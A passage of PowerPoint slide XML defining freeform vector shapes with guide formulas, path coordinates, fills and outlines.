                  <a:gd name="T21" fmla="*/ 11 h 90"/>
                  <a:gd name="T22" fmla="*/ 10 w 82"/>
                  <a:gd name="T23" fmla="*/ 8 h 90"/>
                  <a:gd name="T24" fmla="*/ 13 w 82"/>
                  <a:gd name="T25" fmla="*/ 3 h 90"/>
                  <a:gd name="T26" fmla="*/ 17 w 82"/>
                  <a:gd name="T27" fmla="*/ 3 h 90"/>
                  <a:gd name="T28" fmla="*/ 25 w 82"/>
                  <a:gd name="T29" fmla="*/ 1 h 90"/>
                  <a:gd name="T30" fmla="*/ 27 w 82"/>
                  <a:gd name="T31" fmla="*/ 0 h 90"/>
                  <a:gd name="T32" fmla="*/ 29 w 82"/>
                  <a:gd name="T33" fmla="*/ 1 h 90"/>
                  <a:gd name="T34" fmla="*/ 32 w 82"/>
                  <a:gd name="T35" fmla="*/ 4 h 90"/>
                  <a:gd name="T36" fmla="*/ 35 w 82"/>
                  <a:gd name="T37" fmla="*/ 8 h 90"/>
                  <a:gd name="T38" fmla="*/ 39 w 82"/>
                  <a:gd name="T39" fmla="*/ 14 h 90"/>
                  <a:gd name="T40" fmla="*/ 40 w 82"/>
                  <a:gd name="T41" fmla="*/ 18 h 90"/>
                  <a:gd name="T42" fmla="*/ 42 w 82"/>
                  <a:gd name="T43" fmla="*/ 17 h 90"/>
                  <a:gd name="T44" fmla="*/ 47 w 82"/>
                  <a:gd name="T45" fmla="*/ 14 h 90"/>
                  <a:gd name="T46" fmla="*/ 50 w 82"/>
                  <a:gd name="T47" fmla="*/ 17 h 90"/>
                  <a:gd name="T48" fmla="*/ 53 w 82"/>
                  <a:gd name="T49" fmla="*/ 22 h 90"/>
                  <a:gd name="T50" fmla="*/ 57 w 82"/>
                  <a:gd name="T51" fmla="*/ 24 h 90"/>
                  <a:gd name="T52" fmla="*/ 61 w 82"/>
                  <a:gd name="T53" fmla="*/ 25 h 90"/>
                  <a:gd name="T54" fmla="*/ 68 w 82"/>
                  <a:gd name="T55" fmla="*/ 30 h 90"/>
                  <a:gd name="T56" fmla="*/ 72 w 82"/>
                  <a:gd name="T57" fmla="*/ 34 h 90"/>
                  <a:gd name="T58" fmla="*/ 78 w 82"/>
                  <a:gd name="T59" fmla="*/ 43 h 90"/>
                  <a:gd name="T60" fmla="*/ 79 w 82"/>
                  <a:gd name="T61" fmla="*/ 45 h 90"/>
                  <a:gd name="T62" fmla="*/ 80 w 82"/>
                  <a:gd name="T63" fmla="*/ 45 h 90"/>
                  <a:gd name="T64" fmla="*/ 82 w 82"/>
                  <a:gd name="T65" fmla="*/ 48 h 90"/>
                  <a:gd name="T66" fmla="*/ 82 w 82"/>
                  <a:gd name="T67" fmla="*/ 50 h 90"/>
                  <a:gd name="T68" fmla="*/ 78 w 82"/>
                  <a:gd name="T69" fmla="*/ 57 h 90"/>
                  <a:gd name="T70" fmla="*/ 77 w 82"/>
                  <a:gd name="T71" fmla="*/ 59 h 90"/>
                  <a:gd name="T72" fmla="*/ 79 w 82"/>
                  <a:gd name="T73" fmla="*/ 66 h 90"/>
                  <a:gd name="T74" fmla="*/ 80 w 82"/>
                  <a:gd name="T75" fmla="*/ 68 h 90"/>
                  <a:gd name="T76" fmla="*/ 79 w 82"/>
                  <a:gd name="T77" fmla="*/ 69 h 90"/>
                  <a:gd name="T78" fmla="*/ 73 w 82"/>
                  <a:gd name="T79" fmla="*/ 78 h 90"/>
                  <a:gd name="T80" fmla="*/ 69 w 82"/>
                  <a:gd name="T81" fmla="*/ 83 h 90"/>
                  <a:gd name="T82" fmla="*/ 63 w 82"/>
                  <a:gd name="T83" fmla="*/ 87 h 90"/>
                  <a:gd name="T84" fmla="*/ 60 w 82"/>
                  <a:gd name="T85" fmla="*/ 88 h 90"/>
                  <a:gd name="T86" fmla="*/ 54 w 82"/>
                  <a:gd name="T87" fmla="*/ 89 h 90"/>
                  <a:gd name="T88" fmla="*/ 48 w 82"/>
                  <a:gd name="T89" fmla="*/ 86 h 90"/>
                  <a:gd name="T90" fmla="*/ 44 w 82"/>
                  <a:gd name="T91" fmla="*/ 87 h 90"/>
                  <a:gd name="T92" fmla="*/ 40 w 82"/>
                  <a:gd name="T93" fmla="*/ 88 h 90"/>
                  <a:gd name="T94" fmla="*/ 36 w 82"/>
                  <a:gd name="T95" fmla="*/ 90 h 90"/>
                  <a:gd name="T96" fmla="*/ 33 w 82"/>
                  <a:gd name="T97" fmla="*/ 90 h 90"/>
                  <a:gd name="T98" fmla="*/ 27 w 82"/>
                  <a:gd name="T99" fmla="*/ 84 h 90"/>
                  <a:gd name="T100" fmla="*/ 23 w 82"/>
                  <a:gd name="T101" fmla="*/ 82 h 90"/>
                  <a:gd name="T102" fmla="*/ 17 w 82"/>
                  <a:gd name="T103" fmla="*/ 80 h 90"/>
                  <a:gd name="T104" fmla="*/ 14 w 82"/>
                  <a:gd name="T105" fmla="*/ 81 h 90"/>
                  <a:gd name="T106" fmla="*/ 10 w 82"/>
                  <a:gd name="T107" fmla="*/ 82 h 90"/>
                  <a:gd name="T108" fmla="*/ 8 w 82"/>
                  <a:gd name="T109" fmla="*/ 81 h 90"/>
                  <a:gd name="T110" fmla="*/ 4 w 82"/>
                  <a:gd name="T111" fmla="*/ 76 h 90"/>
                  <a:gd name="T112" fmla="*/ 1 w 82"/>
                  <a:gd name="T113" fmla="*/ 75 h 90"/>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82"/>
                  <a:gd name="T172" fmla="*/ 0 h 90"/>
                  <a:gd name="T173" fmla="*/ 82 w 82"/>
                  <a:gd name="T174" fmla="*/ 90 h 90"/>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82" h="90">
                    <a:moveTo>
                      <a:pt x="1" y="75"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="75"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36247" name="Freeform 380"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1812" y="3446"/>
                <a:ext cx="82" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 82"/>
                  <a:gd name="T1" fmla="*/ 75 h 90"/>
                  <a:gd name="T2" fmla="*/ 2 w 82"/>
                  <a:gd name="T3" fmla="*/ 72 h 90"/>
                  <a:gd name="T4" fmla="*/ 0 w 82"/>
                  <a:gd name="T5" fmla="*/ 67 h 90"/>
                  <a:gd name="T6" fmla="*/ 0 w 82"/>
                  <a:gd name="T7" fmla="*/ 62 h 90"/>
                  <a:gd name="T8" fmla="*/ 2 w 82"/>
                  <a:gd name="T9" fmla="*/ 58 h 90"/>
                  <a:gd name="T10" fmla="*/ 6 w 82"/>
                  <a:gd name="T11" fmla="*/ 54 h 90"/>
                  <a:gd name="T12" fmla="*/ 6 w 82"/>
                  <a:gd name="T13" fmla="*/ 51 h 90"/>
                  <a:gd name="T14" fmla="*/ 5 w 82"/>
                  <a:gd name="T15" fmla="*/ 43 h 90"/>
                  <a:gd name="T16" fmla="*/ 5 w 82"/>
                  <a:gd name="T17" fmla="*/ 35 h 90"/>
                  <a:gd name="T18" fmla="*/ 6 w 82"/>
                  <a:gd name="T19" fmla="*/ 31 h 90"/>
                  <a:gd name="T20" fmla="*/ 10 w 82"/>
                  <a:gd name="T21" fmla="*/ 11 h 90"/>
                  <a:gd name="T22" fmla="*/ 10 w 82"/>
                  <a:gd name="T23" fmla="*/ 8 h 90"/>
                  <a:gd name="T24" fmla="*/ 13 w 82"/>
                  <a:gd name="T25" fmla="*/ 3 h 90"/>
                  <a:gd name="T26" fmla="*/ 17 w 82"/>
                  <a:gd name="T27" fmla="*/ 3 h 90"/>
                  <a:gd name="T28" fmla="*/ 25 w 82"/>
                  <a:gd name="T29" fmla="*/ 1 h 90"/>
                  <a:gd name="T30" fmla="*/ 27 w 82"/>
                  <a:gd name="T31" fmla="*/ 0 h 90"/>
                  <a:gd name="T32" fmla="*/ 29 w 82"/>
                  <a:gd name="T33" fmla="*/ 1 h 90"/>
                  <a:gd name="T34" fmla="*/ 32 w 82"/>
                  <a:gd name="T35" fmla="*/ 4 h 90"/>
                  <a:gd name="T36" fmla="*/ 35 w 82"/>
                  <a:gd name="T37" fmla="*/ 8 h 90"/>
                  <a:gd name="T38" fmla="*/ 39 w 82"/>
                  <a:gd name="T39" fmla="*/ 14 h 90"/>
                  <a:gd name="T40" fmla="*/ 40 w 82"/>
                  <a:gd name="T41" fmla="*/ 18 h 90"/>
                  <a:gd name="T42" fmla="*/ 42 w 82"/>
                  <a:gd name="T43" fmla="*/ 17 h 90"/>
                  <a:gd name="T44" fmla="*/ 47 w 82"/>
                  <a:gd name="T45" fmla="*/ 14 h 90"/>
                  <a:gd name="T46" fmla="*/ 50 w 82"/>
                  <a:gd name="T47" fmla="*/ 17 h 90"/>
                  <a:gd name="T48" fmla="*/ 53 w 82"/>
                  <a:gd name="T49" fmla="*/ 22 h 90"/>
                  <a:gd name="T50" fmla="*/ 57 w 82"/>
                  <a:gd name="T51" fmla="*/ 24 h 90"/>
                  <a:gd name="T52" fmla="*/ 61 w 82"/>
                  <a:gd name="T53" fmla="*/ 25 h 90"/>
                  <a:gd name="T54" fmla="*/ 68 w 82"/>
                  <a:gd name="T55" fmla="*/ 30 h 90"/>
                  <a:gd name="T56" fmla="*/ 72 w 82"/>
                  <a:gd name="T57" fmla="*/ 34 h 90"/>
                  <a:gd name="T58" fmla="*/ 78 w 82"/>
                  <a:gd name="T59" fmla="*/ 43 h 90"/>
                  <a:gd name="T60" fmla="*/ 79 w 82"/>
                  <a:gd name="T61" fmla="*/ 45 h 90"/>
                  <a:gd name="T62" fmla="*/ 80 w 82"/>
                  <a:gd name="T63" fmla="*/ 45 h 90"/>
                  <a:gd name="T64" fmla="*/ 82 w 82"/>
                  <a:gd name="T65" fmla="*/ 48 h 90"/>
                  <a:gd name="T66" fmla="*/ 82 w 82"/>
                  <a:gd name="T67" fmla="*/ 50 h 90"/>
                  <a:gd name="T68" fmla="*/ 78 w 82"/>
                  <a:gd name="T69" fmla="*/ 57 h 90"/>
                  <a:gd name="T70" fmla="*/ 77 w 82"/>
                  <a:gd name="T71" fmla="*/ 59 h 90"/>
                  <a:gd name="T72" fmla="*/ 79 w 82"/>
                  <a:gd name="T73" fmla="*/ 66 h 90"/>
                  <a:gd name="T74" fmla="*/ 80 w 82"/>
                  <a:gd name="T75" fmla="*/ 68 h 90"/>
                  <a:gd name="T76" fmla="*/ 79 w 82"/>
                  <a:gd name="T77" fmla="*/ 69 h 90"/>
                  <a:gd name="T78" fmla="*/ 73 w 82"/>
                  <a:gd name="T79" fmla="*/ 78 h 90"/>
                  <a:gd name="T80" fmla="*/ 69 w 82"/>
                  <a:gd name="T81" fmla="*/ 83 h 90"/>
                  <a:gd name="T82" fmla="*/ 63 w 82"/>
                  <a:gd name="T83" fmla="*/ 87 h 90"/>
                  <a:gd name="T84" fmla="*/ 60 w 82"/>
                  <a:gd name="T85" fmla="*/ 88 h 90"/>
                  <a:gd name="T86" fmla="*/ 54 w 82"/>
                  <a:gd name="T87" fmla="*/ 89 h 90"/>
                  <a:gd name="T88" fmla="*/ 48 w 82"/>
                  <a:gd name="T89" fmla="*/ 86 h 90"/>
                  <a:gd name="T90" fmla="*/ 44 w 82"/>
                  <a:gd name="T91" fmla="*/ 87 h 90"/>
                  <a:gd name="T92" fmla="*/ 40 w 82"/>
                  <a:gd name="T93" fmla="*/ 88 h 90"/>
                  <a:gd name="T94" fmla="*/ 36 w 82"/>
                  <a:gd name="T95" fmla="*/ 90 h 90"/>
                  <a:gd name="T96" fmla="*/ 33 w 82"/>
                  <a:gd name="T97" fmla="*/ 90 h 90"/>
                  <a:gd name="T98" fmla="*/ 27 w 82"/>
                  <a:gd name="T99" fmla="*/ 84 h 90"/>
                  <a:gd name="T100" fmla="*/ 23 w 82"/>
                  <a:gd name="T101" fmla="*/ 82 h 90"/>
                  <a:gd name="T102" fmla="*/ 17 w 82"/>
                  <a:gd name="T103" fmla="*/ 80 h 90"/>
                  <a:gd name="T104" fmla="*/ 14 w 82"/>
                  <a:gd name="T105" fmla="*/ 81 h 90"/>
                  <a:gd name="T106" fmla="*/ 10 w 82"/>
                  <a:gd name="T107" fmla="*/ 82 h 90"/>
                  <a:gd name="T108" fmla="*/ 8 w 82"/>
                  <a:gd name="T109" fmla="*/ 81 h 90"/>
                  <a:gd name="T110" fmla="*/ 4 w 82"/>
                  <a:gd name="T111" fmla="*/ 76 h 90"/>
                  <a:gd name="T112" fmla="*/ 1 w 82"/>
                  <a:gd name="T113" fmla="*/ 75 h 90"/>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82"/>
                  <a:gd name="T172" fmla="*/ 0 h 90"/>
                  <a:gd name="T173" fmla="*/ 82 w 82"/>
                  <a:gd name="T174" fmla="*/ 90 h 90"/>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82" h="90">
                    <a:moveTo>
                      <a:pt x="1" y="75"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="75"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36248" name="Freeform 381"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1275" y="2656"/>
                <a:ext cx="63" cy="67"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 34 w 63"/>
                  <a:gd name="T1" fmla="*/ 67 h 67"/>
                  <a:gd name="T2" fmla="*/ 33 w 63"/>
                  <a:gd name="T3" fmla="*/ 67 h 67"/>
                  <a:gd name="T4" fmla="*/ 26 w 63"/>
                  <a:gd name="T5" fmla="*/ 64 h 67"/>
                  <a:gd name="T6" fmla="*/ 22 w 63"/>
                  <a:gd name="T7" fmla="*/ 65 h 67"/>
                  <a:gd name="T8" fmla="*/ 16 w 63"/>
                  <a:gd name="T9" fmla="*/ 64 h 67"/>
                  <a:gd name="T10" fmla="*/ 12 w 63"/>
                  <a:gd name="T11" fmla="*/ 63 h 67"/>
                  <a:gd name="T12" fmla="*/ 6 w 63"/>
                  <a:gd name="T13" fmla="*/ 58 h 67"/>
                  <a:gd name="T14" fmla="*/ 2 w 63"/>
                  <a:gd name="T15" fmla="*/ 55 h 67"/>
                  <a:gd name="T16" fmla="*/ 2 w 63"/>
                  <a:gd name="T17" fmla="*/ 51 h 67"/>
                  <a:gd name="T18" fmla="*/ 1 w 63"/>
                  <a:gd name="T19" fmla="*/ 47 h 67"/>
                  <a:gd name="T20" fmla="*/ 3 w 63"/>
                  <a:gd name="T21" fmla="*/ 46 h 67"/>
                  <a:gd name="T22" fmla="*/ 0 w 63"/>
                  <a:gd name="T23" fmla="*/ 43 h 67"/>
                  <a:gd name="T24" fmla="*/ 8 w 63"/>
                  <a:gd name="T25" fmla="*/ 29 h 67"/>
                  <a:gd name="T26" fmla="*/ 16 w 63"/>
                  <a:gd name="T27" fmla="*/ 29 h 67"/>
                  <a:gd name="T28" fmla="*/ 28 w 63"/>
                  <a:gd name="T29" fmla="*/ 29 h 67"/>
                  <a:gd name="T30" fmla="*/ 30 w 63"/>
                  <a:gd name="T31" fmla="*/ 24 h 67"/>
                  <a:gd name="T32" fmla="*/ 26 w 63"/>
                  <a:gd name="T33" fmla="*/ 22 h 67"/>
                  <a:gd name="T34" fmla="*/ 23 w 63"/>
                  <a:gd name="T35" fmla="*/ 17 h 67"/>
                  <a:gd name="T36" fmla="*/ 19 w 63"/>
                  <a:gd name="T37" fmla="*/ 16 h 67"/>
                  <a:gd name="T38" fmla="*/ 15 w 63"/>
                  <a:gd name="T39" fmla="*/ 12 h 67"/>
                  <a:gd name="T40" fmla="*/ 13 w 63"/>
                  <a:gd name="T41" fmla="*/ 10 h 67"/>
                  <a:gd name="T42" fmla="*/ 20 w 63"/>
                  <a:gd name="T43" fmla="*/ 10 h 67"/>
                  <a:gd name="T44" fmla="*/ 20 w 63"/>
                  <a:gd name="T45" fmla="*/ 0 h 67"/>
                  <a:gd name="T46" fmla="*/ 33 w 63"/>
                  <a:gd name="T47" fmla="*/ 0 h 67"/>
                  <a:gd name="T48" fmla="*/ 49 w 63"/>
                  <a:gd name="T49" fmla="*/ 1 h 67"/>
                  <a:gd name="T50" fmla="*/ 48 w 63"/>
                  <a:gd name="T51" fmla="*/ 33 h 67"/>
                  <a:gd name="T52" fmla="*/ 53 w 63"/>
                  <a:gd name="T53" fmla="*/ 32 h 67"/>
                  <a:gd name="T54" fmla="*/ 55 w 63"/>
                  <a:gd name="T55" fmla="*/ 33 h 67"/>
                  <a:gd name="T56" fmla="*/ 57 w 63"/>
                  <a:gd name="T57" fmla="*/ 35 h 67"/>
                  <a:gd name="T58" fmla="*/ 58 w 63"/>
                  <a:gd name="T59" fmla="*/ 34 h 67"/>
                  <a:gd name="T60" fmla="*/ 58 w 63"/>
                  <a:gd name="T61" fmla="*/ 31 h 67"/>
                  <a:gd name="T62" fmla="*/ 60 w 63"/>
                  <a:gd name="T63" fmla="*/ 32 h 67"/>
                  <a:gd name="T64" fmla="*/ 63 w 63"/>
                  <a:gd name="T65" fmla="*/ 35 h 67"/>
                  <a:gd name="T66" fmla="*/ 53 w 63"/>
                  <a:gd name="T67" fmla="*/ 44 h 67"/>
                  <a:gd name="T68" fmla="*/ 49 w 63"/>
                  <a:gd name="T69" fmla="*/ 46 h 67"/>
                  <a:gd name="T70" fmla="*/ 48 w 63"/>
                  <a:gd name="T71" fmla="*/ 49 h 67"/>
                  <a:gd name="T72" fmla="*/ 49 w 63"/>
                  <a:gd name="T73" fmla="*/ 54 h 67"/>
                  <a:gd name="T74" fmla="*/ 46 w 63"/>
                  <a:gd name="T75" fmla="*/ 56 h 67"/>
                  <a:gd name="T76" fmla="*/ 43 w 63"/>
                  <a:gd name="T77" fmla="*/ 56 h 67"/>
                  <a:gd name="T78" fmla="*/ 42 w 63"/>
                  <a:gd name="T79" fmla="*/ 58 h 67"/>
                  <a:gd name="T80" fmla="*/ 43 w 63"/>
                  <a:gd name="T81" fmla="*/ 59 h 67"/>
                  <a:gd name="T82" fmla="*/ 41 w 63"/>
                  <a:gd name="T83" fmla="*/ 60 h 67"/>
                  <a:gd name="T84" fmla="*/ 40 w 63"/>
                  <a:gd name="T85" fmla="*/ 62 h 67"/>
                  <a:gd name="T86" fmla="*/ 38 w 63"/>
                  <a:gd name="T87" fmla="*/ 62 h 67"/>
                  <a:gd name="T88" fmla="*/ 34 w 63"/>
                  <a:gd name="T89" fmla="*/ 66 h 67"/>
                  <a:gd name="T90" fmla="*/ 34 w 63"/>
                  <a:gd name="T91" fmla="*/ 67 h 67"/>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63"/>
                  <a:gd name="T139" fmla="*/ 0 h 67"/>
                  <a:gd name="T140" fmla="*/ 63 w 63"/>
                  <a:gd name="T141" fmla="*/ 67 h 67"/>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63" h="67">
                    <a:moveTo>
                      <a:pt x="34" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="33" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
